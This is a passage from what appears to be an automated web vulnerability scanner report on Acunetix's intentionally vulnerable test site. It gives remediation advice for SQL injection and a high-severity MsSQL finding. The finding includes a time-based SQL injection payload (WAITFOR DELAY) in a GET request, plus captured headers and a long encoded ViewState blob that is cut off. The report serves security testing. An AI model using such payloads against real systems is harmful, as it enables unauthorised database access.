title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	3
Solution	Do not trust client side input, even if there is client side validation in place. In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?' If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do not concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the privilege of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact. Grant the minimum database access that is necessary for the application.
Reference	https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags	OWASP_2021_A03 WSTG-v42-INPV-05 OWASP_2017_A01
CWE Id	89
WASC Id	19
Plugin Id	40018

High	SQL Injection - MsSQL
Description	SQL injection may be possible

URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	id
Attack	0 WAITFOR DELAY '0:0:15' --
Evidence
Show / hide Request and Response
Request Header - size: 517 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:47:59 GMT Content-Length: 61060
Response Body - size: 61,060 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0+WAITFOR+DELAY+'0%3a0%3a15'+--+" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBbMBGYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIHD2QWAmYPFgIfAwUHQ29tbWVudGQCCA9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCCQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgoPZBYCZg8WAh8DBQdDb21tZW50ZAILD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIMD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCDQ9kFgJmDxYCHwMFB0NvbW1lbnRkAg4PZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAg8PZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIQD2QWAmYPFgIfAwUHQ29tbWVudGQCEQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCEg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAhMPZBYCZg8WAh8DBQdDb21tZW50ZAIUD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIVD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCFg9kFgJmDxYCHwMFB0NvbW1lbnRkAhcPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAhgPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIZD2QWAmYPFgIfAwUHQ29tbWVudGQCGg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCGw9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAhwPZBYCZg8WAh8DBQdDb21tZW50ZAIdD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIeD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCHw9kFgJmDxYCHwMFB0NvbW1lbnRkAiAPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAiEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIiD2QWAmYPFgIfAwUHQ29tbWVudGQCIw9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCJA9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAiUPZBYCZg8WAh8DBQdDb21tZW50ZAImD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAInD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCKA9kFgJmDxYCHwMFB0NvbW1lbnRkAikPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAioPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIrD2QWAmYPFgIfAwUHQ29tbWVudGQCLA9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCLQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAi4PZBYCZg8WAh8DBQdDb21tZW50ZAIvD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIwD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCMQ9kFgJmDxYCHwMFB0NvbW1lbnRkAjIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAjMPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAI0D2QWAmYPFgIfAwUHQ29tbWVudGQCNQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCNg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAjcPZBYCZg8WAh8DBQdDb21tZW50ZAI4D2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAI5D2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCOg9kFgJmDxYCHwMFB0NvbW1lbnRkAjsPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAjwPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAI9D2QWAmYPFgIfAwUHQ29tbWVudGQCPg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCPw9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAkAPZBYCZg8WAh8DBQdDb21tZW50ZAJBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJCD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCQw9kFgJmDxYCHwMFB0NvbW1lbnRkAkQPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAkUPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAJGD2QWAmYPFgIfAwUHQ29tbWVudGQCRw9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCSA9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAkkPZBYCZg8WAh8DBQdDb21tZW50ZAJKD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJLD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCTA9kFgJmDxYCHwMFB0NvbW1lbnRkAk0PZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAk4PZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAJPD2QWAmYPFgIfAwUHQ29tbWVudGQCUA9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCUQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAlIPZBYCZg8WAh8DBQdDb21tZW50ZAJTD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJUD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCVQ9kFgJmDxYCHwMFB0NvbW1lbnRkAlYPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAlcPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAJYD2QWAmYPFgIfAwUHQ29tbWVudGQCWQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCWg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAlsPZBYCZg8WAh8DBQdDb21tZW50ZAJcD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJdD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCXg9kFgJmDxYCHwMFB0NvbW1lbnRkAl8PZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAmAPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAJhD2QWAmYPFgIfAwUHQ29tbWVudGQCYg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCYw9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAmQPZBYCZg8WAh8DBQdDb21tZW50ZAJlD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJmD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCZw9kFgJmDxYCHwMFB0NvbW1lbnRkAmgPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAmkPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAJqD2QWAmYPFgIfAwUHQ29tbWVudGQCaw9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCbA9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAm0PZBYCZg8WAh8DBQdDb21tZW50ZAJuD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJvD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCcA9kFgJmDxYCHwMFB0NvbW1lbnRkAnEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAnIPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAJzD2QWAmYPFgIfAwUHQ29tbWVudGQCdA9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCdQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAnYPZBYCZg8WAh8DBQdDb21tZW50ZAJ3D2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAJ4D2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCeQ9kFgJmDxYCHwMFB0NvbW1lbnRkAnoPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAnsPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAJ8D2QWAmYPFgIfAwUHQ29tbWVudGQCfQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCfg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAn8PZBYCZg8WAh8DBQdDb21tZW50ZAKAAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCgQEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKCAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAoMBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKEAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAoUBD2QWAmYPFgIfAwUHQ29tbWVudGQChgEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAocBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCiAEPZBYCZg8WAh8DBQdDb21tZW50ZAKJAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCigEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKLAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAowBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKNAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAo4BD2QWAmYPFgIfAwUHQ29tbWVudGQCjwEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kApABD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCkQEPZBYCZg8WAh8DBQdDb21tZW50ZAKSAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCkwEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKUAQ9kFgJmDxYCHwMFB0NvbW1lbnRkApUBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKWAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kApcBD2QWAmYPFgIfAwUHQ29tbWVudGQCmAEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kApkBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCmgEPZBYCZg8WAh8DBQdDb21tZW50ZAKbAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCnAEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKdAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAp4BD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKfAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAqABD2QWAmYPFgIfAwUHQ29tbWVudGQCoQEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAqIBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCowEPZBYCZg8WAh8DBQdDb21tZW50ZAKkAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCpQEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKmAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAqcBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKoAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAqkBD2QWAmYPFgIfAwUHQ29tbWVudGQCqgEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAqsBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCrAEPZBYCZg8WAh8DBQdDb21tZW50ZAKtAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCrgEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAKvAQ9kFgJmDxYCHwMFB0NvbW1lbnRkArABD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAKxAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kArIBD2QWAmYPFgIfAwUHQ29tbWVudGQCswEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kArQBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCtQEPZBYCZg8WAh8DBQdDb21tZW50ZAK2AQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCtwEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAK4AQ9kFgJmDxYCHwMFB0NvbW1lbnRkArkBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAK6AQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kArsBD2QWAmYPFgIfAwUHQ29tbWVudGQCvAEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAr0BD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCvgEPZBYCZg8WAh8DBQdDb21tZW50ZAK/AQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCwAEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZALBAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAsIBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZALDAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAsQBD2QWAmYPFgIfAwUHQ29tbWVudGQCxQEPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAsYBD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCxwEPZBYCZg8WAh8DBQdDb21tZW50ZALIAQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCyQEPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZALKAQ9kFgJmDxYCHwMFB0NvbW1lbnRkAssBD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZALMAQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAs0BD2QWAmYPFgIfAwUH